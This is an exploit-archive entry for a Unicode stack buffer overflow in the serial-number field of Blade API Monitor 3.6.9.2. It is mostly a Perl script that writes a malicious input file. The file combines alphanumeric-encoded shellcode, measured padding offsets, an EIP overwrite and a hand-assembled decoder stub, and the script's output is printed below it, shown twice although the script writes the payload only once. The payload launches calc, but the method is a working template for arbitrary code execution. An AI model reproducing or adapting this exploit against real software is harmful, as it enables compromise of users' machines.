
Blade API Monitor 3.6.9.2 Buffer Overflow

Blade API Monitor 3.6.9.2 Buffer Overflow
Posted Jan 10, 2012
Authored by FullMetalFouad

Blade API Monitor version 3.6.9.2 unicode stack buffer overflow exploit.

tags | exploit, overflow
MD5 | 734fb399bee693d10f2b4503ed9abf75

Blade API Monitor 3.6.9.2 Buffer Overflow

# Exploit Title: Blade API Monitor Unicode Stack Buffer Overflow (the serial number!!) 
# Date: 25/12/2011
# Author: FullMetalFouad
# Version: 3.6.9.2
# Tested on: Windows XP/7
################################################################

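use strict;
use warnings;

# Proof-of-concept file generator.  It concatenates the fixed stages declared
# below and writes them, as raw bytes, to $file.  Nothing is derived from
# input: every length and byte value comes from the author's analysis of the
# vulnerable build and is left exactly as written.  Only the output handling
# is changed here: a declared lexical handle, three-argument open, binary
# mode, and checked write/close so a failed write cannot report success.
my $file= "bof_blade.txt";

# windows/Winexec - 178 bytes
# VERBOSE=false, EXITFUNC=process, CMD=calc encoder=Alpha3
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\calc.txt" --verbose
my $shellcode_calc =
"hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J".
"0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I".
"2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W".
"0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p".
"034r032m334t3w3m02";

#
# first stage to prepare the $shellcode_calc execution :
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\shellcode.txt" --verbose
# "\x05\xF6\xFC\xFF\xFF" ;# sub eax, 30A
# "\x33\xDB" ;# xor ebx,ebx
# "\x33\xC9" ;# xor ecx,ecx
# "\xFE\xC5" ;# inc ch
#
# "\x43" ;# inc ebx
# "\x8A\x14\x58" ;# mov dl, [eax+ebx*2]
# "\x88\x14\x18" ;# mov [eax+ebx], dl
# "\xE2\xF7" ;# loop
# "\xFF\xE0" ;# jmp eax
my $shellcode = "hffffk4diFkTpk02Tpl0T0Bu".
"EE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0m";


# Padding up to the saved registers; the counts are the author's measured
# offsets for this build.
my $junk1 = "\xCC" x 104;
$junk1 = $junk1 ."\x35" x 2; # ECX
$junk1 = $junk1 ."\x41" x 6; # EBP

my $eip = "\x3e\x43"; # 0x0043003e : call ebx | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [BladeAPIMonitor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.6.9.2 (C:\Program Files\BladeAPIMonitor\BladeAPIMonitor.exe)
my $junk2 = "\x42" x 20;
my $buffer = "\x41" x 246;

my $finder = "";
my $part0 = "";
my $part1 = "";
my $part2 = "";
my $part3 = "";

# 0 part : we do EAX = EBX + length(part0+part1+part2 +1 ), to point to the first null byte of the loop code.
# _part_0_:__________________________________________________
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xBA\x58\x58"; # | BA00580058 mov edx, 58005800 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5F"; # | 5F pop edi |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xB9\x3B\x3B"; # | B9003B003B mov ecx, 3B003B00 (diff) |
$part0 = $part0. "\xF5"; # | 00F5 add ch,dh |
$part0 = $part0. "\x6F"; # | 006F00 add [edi+0x0],ch |
$part0 = $part0. "\xD6"; # | D6 salc |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5B"; # | 5B pop ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x50"; # | 50 push eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xC1\x19"; # | C10019 rol dword ptr [eax], 19 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\xC7"; # | 00C7 add bh,al |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x52"; # | 52 push edx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
##################################### |__________________________________________________________|


# 1st part : we do EBX=0x00000000, and ECX=0x00000100 (approximative size of buffer)
# _part_1_:__________________________________________________
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x5B"; # | 5B pop ebx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\x59"; # | 59 pop ecx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\xBA\x01\x41"; # | BA00010041 mov edx,0x41000100 |
$part1 = $part1. "\xF5"; # | 00F5 add ch,dh |
##################################### |__________________________________________________________|

# 2nd part : The patching of the 'loop code' :
# _part_2_:__________________________________________________
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x5A"; # | 5A pop edx |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x32"; # | C60032 mov byte [eax],0x32 ; 0x8A-0x58 |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x88 dh=58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x14"; # | C60014 mov byte [eax],0x14 ; 0x14 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\xE2"; # | C600E2 mov byte [eax],0xE2 ; 0xE2 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
# |__________________________________________________________|

# 3rd part : The loop code (stuffed with nulls of course)
# _part_3_:___________________________________________________
# | ; eax points to our shellcode |
# | ; ebx is 0x00000000 |
# | ; ecx is 0x00000500 (for example) |
# | |
# | label: |
$part3 = $part3. "\x43"; # | 43 inc ebx |
$part3 = $part3. "\x14"; # | 8A1458 mov byte dl,[eax+2*ebx] |
$part3 = $part3. "\x30\x18"; # | 881418 mov byte [eax+ebx],dl |
$part3 = $part3. "\xF7"; # | E2F7 loop label |
# |__________________________________________________________|

$finder = $part0.$part1.$part2.$part3;

# Assemble the whole file content once so it is written by a single,
# checked print; the byte order is unchanged from the original script.
my $payload = $shellcode_calc.$junk1.$eip.$junk2.$finder.$shellcode."\xFF\xFF\xFF\xFF".$buffer."\x43\x43\x43\x43";

# Three-argument open with a lexical handle replaces the original unchecked
# two-argument open on an undeclared global.  binmode keeps every byte as
# written (no newline or encoding layer), and close is checked because
# buffered write errors only surface there.
open(my $fh, '>', $file) or die "open $file: $!";
binmode($fh) or die "binmode $file: $!";
print {$fh} $payload or die "write $file: $!";
close($fh) or die "close $file: $!";
print "File Created successfully\n";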

# output: hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCChffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC




